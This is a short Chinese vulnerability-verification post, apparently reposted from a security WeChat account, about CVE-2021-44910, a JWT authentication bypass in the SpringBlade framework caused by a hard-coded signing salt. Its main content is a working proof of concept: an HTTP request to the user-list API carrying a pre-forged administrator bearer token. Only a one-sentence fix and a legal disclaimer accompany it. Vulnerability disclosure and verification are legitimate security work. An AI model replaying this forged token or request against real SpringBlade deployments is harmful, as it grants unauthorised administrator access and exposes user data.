漏洞验证-SpringBlade框架JWT认证缺陷(CVE-2021-44910)

admin 2026-03-04 09:56:14 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档详述SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910,核心原因为接口信息泄露与jar包硬编码salt导致凭证可被伪造。文中提供了伪造管理员Token访问接口的POC验证过程,并建议联系厂商升级至最新版本以修复安全隐患。 综合评分: 68 文章分类: 漏洞POC,漏洞分析,WEB安全


cover_image

漏洞验证-SpringBlade框架JWT认证缺陷(CVE-2021-44910)

Domren Domren

网安智界

2026年3月3日 17:02 浙江

一、漏洞描述

SpringBlade框架JWT通过app.js泄露的接口信息和硬编码在jar包中的salt可以轻易的伪造用户或管理员凭证。

二、验证POC

GET /api/blade-user/user-list HTTP/1.1

Host: XXXX

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko

Accept: */*

Accept-Encoding: gzip,deflate

Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3

blade-auth: bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIn0.JOsWrAkblh7PFJFrr_cmuOQMrzStfwvee61sSVH4o6p401oAHpP284VkL0CyKnUX1MT8KnrCAOPRYBRbmfcdTg

三、验证截图

四。整改建议

联系厂商升级到最新版本。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:网安智界 Domren Domren《漏洞验证-SpringBlade框架JWT认证缺陷(CVE-2021-44910)》

评论:0   参与:  0